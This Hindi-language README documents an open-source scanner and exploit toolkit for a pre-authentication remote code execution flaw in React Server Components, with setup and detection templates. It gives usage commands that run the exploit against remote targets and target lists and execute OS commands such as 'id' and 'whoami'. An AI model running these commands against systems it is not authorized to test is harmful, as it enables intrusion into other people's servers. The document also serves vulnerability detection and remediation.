
CVE-2025-55182 के लिए स्कैनर और एक्सप्लॉइट टूलकिट, React सर्वर घटकों में एक महत्वपूर्ण प्री-ऑथ RCE। इसमें पहचान, इंटरैक्टिव शेल, Docker तैनाती और शैक्षिक तकनीकी विश्लेषण शामिल है।
CVE-2025-55182 के लिए एक व्यापक सुरक्षा परीक्षण टूलकिट, जो React सर्वर कम्पोनेंट्स में एक गंभीर प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन भेद्यता है।
क्या आप इस भेद्यता को 100% समझना चाहते हैं?
📖 हमारी संपूर्ण तकनीकी विश्लेषण पढ़ें - आपको जो कुछ भी जानने की आवश्यकता है:
- React सर्वर पर क्यों चलता है (सिर्फ ब्राउज़र में नहीं!)
- विज़ुअल डायग्राम के साथ हमला कैसे काम करता है
- एक्सप्लॉइट की हर पंक्ति समझाई गई
- शुरुआती अवधारणाओं से लेकर उन्नत शोषण तक
- कोई पूर्वापेक्षा आवश्यक नहीं!
इसके लिए उपयुक्त: सुरक्षा रिपोर्ट, प्रशिक्षण सामग्री, खतरा विश्लेषण, या सिर्फ सीखना!
यह भेद्यता React सर्वर कम्पोनेंट्स संस्करणों 19.0.0 से 19.2.0 को प्रभावित करती है, जो निम्नलिखित को प्रभावित करती है:
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpackप्रभाव: अप्रमाणित हमलावर सर्वर फ़ंक्शन एंडपॉइंट्स पर HTTP अनुरोध पेलोड के असुरक्षित डिसीरियलाइज़ेशन के माध्यम से दूरस्थ रूप से मनमाना कोड निष्पादित कर सकते हैं।
👉 संपूर्ण तकनीकी विश्लेषण पढ़ें - एक व्यापक गाइड जो कवर करता है:
इसके लिए उपयुक्त:
कोई पूर्व ज्ञान आवश्यक नहीं - बुनियादी से शुरू होता है और उन्नत शोषण तकनीकों तक बनाता है!
केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए
यह उपकरण केवल इसके लिए है:
चेतावनी: कंप्यूटर सिस्टम में अनधिकृत पहुँच अवैध है। उपयोगकर्ता सभी लागू कानूनों और विनियमों का पालन करने के लिए जिम्मेदार हैं। लेखक इस उपकरण के दुरुपयोग के लिए कोई दायित्व नहीं लेते हैं।
कोई निर्भरता आवश्यक नहीं! त्वरित परीक्षण के लिए एकल बैश स्क्रिप्ट।
👉 EXPLOIT_SCRIPT.md - स्टैंडअलोन स्क्रिप्ट जो:
# Single target
./exploit-cve-2025-55182.sh http://target.com
# Multiple targets
./exploit-cve-2025-55182.sh -f targets.txt
डॉकर, वेब UI और न्यूक्ली इंटीग्रेशन के साथ पूर्ण टूलकिट। स्थापना के लिए नीचे पढ़ना जारी रखें।
| विशेषता | विवरण |
|---|---|
| 🐳 डॉकर समर्थन | डॉकर कंपोज़ के साथ एक-कमांड तैनाती |
| 🌐 वेब इंटरफ़ेस | गैर-तकनीकी उपयोगकर्ताओं के लिए उपयोगकर्ता-अनुकूल वेब UI |
| 🔍 असुरक्षित परीक्षण वातावरण | सुरक्षित परीक्षण के लिए स्थानीय असुरक्षित ऐप स्पिन अप करें |
| 🎯 दूरस्थ स्कैनिंग | भेद्यता के लिए बाहरी लक्ष्यों का परीक्षण करें |
| ⚡ इंटरैक्टिव शेल | OS कमांड निष्पादित करें और वास्तविक समय में परिणाम देखें |
| 📊 एकाधिक स्कैन मोड | केवल पता लगाना या पूर्ण शोषण |
| 📝 विस्तृत रिपोर्टिंग | JSON और टेक्स्ट आउटपुट प्रारूप |
| 🔧 न्यूक्ली इंटीग्रेशन | प्रोजेक्टडिस्कवरी के शक्तिशाली स्कैनर का लाभ उठाएं |
अपनी स्थापना विधि चुनें:
# Clone repository
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Start scanner
docker compose up
# Access web interface at http://localhost:3001
# Clone repository
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Install Nuclei (macOS)
brew install nuclei
# Make scripts executable
chmod +x scripts/*.sh
📖 विस्तृत सेटअप: चरण-दर-चरण निर्देशों के लिए SETUP_GUIDE.md देखें
⚡ त्वरित संदर्भ: सामान्य उपयोग के मामलों के लिए QUICKSTART.md देखें
वेब इंटरफ़ेस प्रारंभ करें:
docker compose up
# Open browser: http://localhost:3001
असुरक्षित परीक्षण ऐप के साथ प्रारंभ करें:
docker compose --profile with-vulnerable-app up
# Scanner: http://localhost:3001
# Vulnerable app: http://localhost:3000
डॉकर उपयोगकर्ताओं के लिए महत्वपूर्ण: डॉकर से स्कैन करते समय, उपयोग करें:
http://host.docker.internal:3000 अपने होस्ट मशीन पर ऐप्स स्कैन करने के लिएhttp://vulnerable-app:3000 कंटेनरीकृत असुरक्षित ऐप स्कैन करने के लिएhttps://example.comhttp://localhost:3001 पर जाएंएक स्थानीय असुरक्षित ऐप बनाएं और उसके विरुद्ध परीक्षण करें:
# Terminal 1: Start vulnerable app
./scripts/setup-vulnerable-app.sh
# App will run on http://localhost:3000
# Terminal 2: Test it
./scripts/test-local.sh
# Execute custom commands
./scripts/test-local.sh "whoami"
./scripts/test-local.sh "pwd"
./scripts/test-local.sh "ls -la"
# Basic scan
./scripts/test-remote.sh https://target.com
# With command execution
./scripts/test-remote.sh https://target.com "id"
# Create targets file
cat > targets.txt << EOF
https://target1.com
https://target2.com
https://target3.com
EOF
# Scan all targets
./scripts/test-multiple.sh targets.txt
बुनियादी भेद्यता का पता लगाना:
nuclei -t templates/cve-2025-55182.yaml -u http://localhost:3000 -v
कस्टम कमांड निष्पादित करें:
nuclei -t templates/cve-2025-55182-interactive.yaml \
-u http://localhost:3000 \
-var cmd="whoami" \
-v
एकाधिक लक्ष्यों को स्कैन करें:
nuclei -t templates/cve-2025-55182.yaml -l targets.txt -v
CVE-2025-55182-Scanner/
├── README.md # Main documentation
├── EXPLOIT_SCRIPT.md # Standalone script guide
├── QUICKSTART.md # Quick start guide
├── SETUP_GUIDE.md # Detailed setup instructions
├── LICENSE # MIT License
│
├── exploit-cve-2025-55182.sh # Standalone exploit script
│
├── Dockerfile # Docker configuration
├── docker-compose.yml # Docker Compose setup
│
├── templates/ # Nuclei templates
│ ├── cve-2025-55182.yaml # Detection template
│ └── cve-2025-55182-interactive.yaml # Interactive RCE template
│
├── scripts/ # Helper scripts
│ ├── setup-vulnerable-app.sh # Setup local vulnerable app
│ ├── test-local.sh # Test local instance
│ ├── test-remote.sh # Test remote target
│ └── test-multiple.sh # Test multiple targets
│
├── web-ui/ # Web interface
│ ├── server.js # Express server
│ ├── package.json # Dependencies
│ └── public/
│ └── index.html # Frontend
│
├── vulnerable-app/ # Vulnerable test app (generated)
│ ├── Dockerfile # Docker config
│ └── ...
│
└── docs/ # 📚 Documentation
├── TECHNICAL.md # ⭐ COMPLETE vulnerability guide
│ # - How it works (basics to advanced)
│ # - Attack flow with diagrams
│ # - Payload analysis (every line explained)
│ # - Detection & prevention
│ # - Real-world examples
└── REMEDIATION.md # Fix instructions
docs/TECHNICAL.md ⭐ सबसे व्यापक संसाधन
यह भेद्यता React सर्वर कम्पोनेंट्स में असुरक्षित डिसीरियलाइज़ेशन से उत्पन्न होती है। हमलावर यह कर सकते हैं:
child_process मॉड्यूल तक पहुँच प्राप्त करेंक्या आप ठीक-ठीक समझना चाहते हैं कि यह कैसे काम करता है?
इस व्यापक गाइड में शामिल है:
✅ React सर्वर कम्पोनेंट्स सर्वर पर क्यों चलते हैं (ब्राउज़र नहीं)
✅ जावास्क्रिप्ट में प्रोटोटाइप प्रदूषण कैसे काम करता है
✅ विज़ुअल डायग्राम के साथ चरण-दर-चरण हमला प्रवाह
✅ एक्सप्लॉइट पेलोड का हर बाइट समझाया गया
✅ हमलावर JSON से कोड निष्पादन कैसे प्राप्त करते हैं
✅ वास्तविक दुनिया के प्रूफ ऑफ कॉन्सेप्ट उदाहरण
✅ पता लगाने के तरीके और रोकथाम की रणनीतियाँ
सरल भाषा में लिखा गया - किसी PhD की आवश्यकता नहीं! एक दस्तावेज़ में "React बुनियादी बातों" से "पूर्ण शोषण" तक जाता है।
इसके लिए उपयुक्त:
यदि आप एक असुरक्षित संस्करण चला रहे हैं:
पूर्ण गाइड: docs/REMEDIATION.md - पूर्ण उपचार चरण
🎓 पूर्ण तकनीकी विश्लेषण - हमारी व्यापक गाइड
हमारी तकनीकी गाइड क्यों पढ़ें?
द्वारा उपयोग किया गया: दुनिया भर में सुरक्षा शोधकर्ता, डेवलपर्स, पेनिट्रेशन परीक्षक और शिक्षक।
योगदान का स्वागत है! योगदान देने के लिए:
git checkout -b feature/improvement)git commit -am 'Add new feature')git push origin feature/improvement)यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
StealthMoud
यदि आपको यह उपकरण उपयोगी लगे, तो कृपया ⭐ इस रिपॉजिटरी को स्टार करें और अपना समर्थन दिखाएं!
अपडेट और नई सुविधाओं के लिए इस रिपॉजिटरी को वॉच करें।
यह उपकरण सुरक्षा पेशेवरों को असुरक्षित सिस्टम की पहचान करने और उनका उपचार करने में मदद करने के लिए जारी किया गया है। हमेशा:
✅ परीक्षण से पहले स्पष्ट लिखित अनुमति प्राप्त करें
✅ प्रभावित पक्षों को जिम्मेदारी से निष्कर्ष रिपोर्ट करें
✅ सभी लागू कानूनों और विनियमों का अनुपालन करें
❌ अनधिकृत पहुँच के लिए इस उपकरण का कभी उपयोग न करें
❌ दुर्भावनापूर्ण उद्देश्यों के लिए इस उपकरण का कभी उपयोग न करें
याद रखें: अनधिकृत कंप्यूटर पहुँच एक अपराध है। जिम्मेदारी से परीक्षण करें।